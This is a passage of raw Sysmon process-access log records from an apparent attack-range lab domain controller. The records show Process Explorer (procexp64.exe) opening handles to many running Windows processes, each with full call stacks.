15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet 